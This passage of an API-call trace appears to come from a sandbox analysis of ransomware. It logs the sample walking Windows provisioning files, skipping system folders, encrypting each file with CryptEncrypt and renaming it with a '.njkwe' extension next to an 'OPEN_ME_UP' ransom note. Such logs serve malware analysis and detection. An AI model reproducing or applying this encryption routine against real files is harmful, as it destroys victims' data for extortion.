nFileSizeHigh=0x0, nFileSizeLow=0x2c6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="252__C~1.PRO")) returned 1 [0077.679] lstrcmpiW (lpString1="252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.679] lstrcmpiW (lpString1="252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.679] lstrcmpiW (lpString1="252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.679] lstrcmpiW (lpString1="252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.679] lstrcmpiW (lpString1="252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.679] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml") returned 164 [0077.679] StrStrIW (lpFirst="252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.679] lstrcmpW (lpString1="252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.679] lstrcmpW (lpString1="252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.679] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\252__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.679] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\252__connections_cellular_smartone (macao sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.680] GetTickCount () returned 0x1153c0b [0077.680] GetTickCount () returned 0x1153c0b [0077.680] GetTickCount () returned 0x1153c0b [0077.680] GetTickCount () returned 0x1153c0b [0077.680] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.680] GetProcessHeap () returned 0xbe0000 [0077.680] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.680] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0077.681] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.681] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c6, lpOverlapped=0x0) returned 1 [0077.682] GetProcessHeap () returned 0xbe0000 [0077.682] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.682] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.682] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.682] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.682] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.682] CloseHandle (hObject=0x43c) returned 1 [0077.682] GetProcessHeap () returned 0xbe0000 [0077.682] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.682] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0077.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\252__connections_cellular_smartone (macao sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\252__Connections_Cellular_SmarTone (Macao SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\252__connections_cellular_smartone (macao sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.683] GetProcessHeap () returned 0xbe0000 [0077.683] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.683] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909955a7, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909955a7, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909955a7, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x361, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml", cAlternateFileName="253__C~1.PRO")) returned 1 [0077.683] lstrcmpiW (lpString1="253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.683] lstrcmpiW (lpString1="253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.683] lstrcmpiW (lpString1="253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.683] lstrcmpiW (lpString1="253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.683] lstrcmpiW (lpString1="253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.683] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml") returned 180 [0077.683] StrStrIW (lpFirst="253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.683] lstrcmpW (lpString1="253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.683] lstrcmpW (lpString1="253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.683] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\253__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.683] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\253__connections_cellular_t-mobile macedonia (macedonia, fyro)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.683] GetTickCount () returned 0x1153c0b [0077.683] GetTickCount () returned 0x1153c0b [0077.683] GetTickCount () returned 0x1153c0b [0077.683] GetTickCount () returned 0x1153c0b [0077.684] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.684] GetProcessHeap () returned 0xbe0000 [0077.684] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.684] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x361, lpOverlapped=0x0) returned 1 [0077.686] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.686] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x361, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x361, lpOverlapped=0x0) returned 1 [0077.686] GetProcessHeap () returned 0xbe0000 [0077.686] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.686] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.686] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.686] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.686] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.686] CloseHandle (hObject=0x43c) returned 1 [0077.690] GetProcessHeap () returned 0xbe0000 [0077.690] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.690] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 200 [0077.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\253__connections_cellular_t-mobile macedonia (macedonia, fyro)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\253__Connections_Cellular_T-Mobile Macedonia (Macedonia, FYRO)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\253__connections_cellular_t-mobile macedonia (macedonia, fyro)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.691] GetProcessHeap () returned 0xbe0000 [0077.691] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.691] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909955a7, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909955a7, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909955a7, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="254__C~1.PRO")) returned 1 [0077.691] lstrcmpiW (lpString1="254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.691] lstrcmpiW (lpString1="254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.691] lstrcmpiW (lpString1="254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.691] lstrcmpiW (lpString1="254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.691] lstrcmpiW (lpString1="254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.691] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml") returned 180 [0077.691] StrStrIW (lpFirst="254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.691] lstrcmpW (lpString1="254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.691] lstrcmpW (lpString1="254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.691] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\254__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.691] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\254__connections_cellular_vip operator (republic of macedonia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.691] GetTickCount () returned 0x1153c1b [0077.691] GetTickCount () returned 0x1153c1b [0077.691] GetTickCount () returned 0x1153c1b [0077.691] GetTickCount () returned 0x1153c1b [0077.692] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.692] GetProcessHeap () returned 0xbe0000 [0077.692] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.692] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x368, lpOverlapped=0x0) returned 1 [0077.707] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc98, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.707] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x368, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x368, lpOverlapped=0x0) returned 1 [0077.707] GetProcessHeap () returned 0xbe0000 [0077.707] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.708] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.708] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.708] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.708] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.708] CloseHandle (hObject=0x43c) returned 1 [0077.708] GetProcessHeap () returned 0xbe0000 [0077.708] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.708] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 200 [0077.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\254__connections_cellular_vip operator (republic of macedonia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\254__Connections_Cellular_Vip Operator (Republic of Macedonia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\254__connections_cellular_vip operator (republic of macedonia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.709] GetProcessHeap () returned 0xbe0000 [0077.709] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.709] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x909955a7, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x909955a7, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x909955a7, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="255__C~1.PRO")) returned 1 [0077.714] lstrcmpiW (lpString1="255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.714] lstrcmpiW (lpString1="255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.714] lstrcmpiW (lpString1="255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.714] lstrcmpiW (lpString1="255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.714] lstrcmpiW (lpString1="255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.714] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0077.714] StrStrIW (lpFirst="255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.714] lstrcmpW (lpString1="255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.714] lstrcmpW (lpString1="255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.714] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\255__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.714] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\255__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\255__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.715] GetTickCount () returned 0x1153c2b [0077.715] GetTickCount () returned 0x1153c2b [0077.715] GetTickCount () returned 0x1153c2b [0077.715] GetTickCount () returned 0x1153c2b [0077.715] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.715] GetProcessHeap () returned 0xbe0000 [0077.715] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.715] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0077.716] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.716] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1d8, lpOverlapped=0x0) returned 1 [0077.716] GetProcessHeap () returned 0xbe0000 [0077.716] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.717] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.717] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.717] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.717] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.717] CloseHandle (hObject=0x43c) returned 1 [0077.717] GetProcessHeap () returned 0xbe0000 [0077.718] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.718] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: 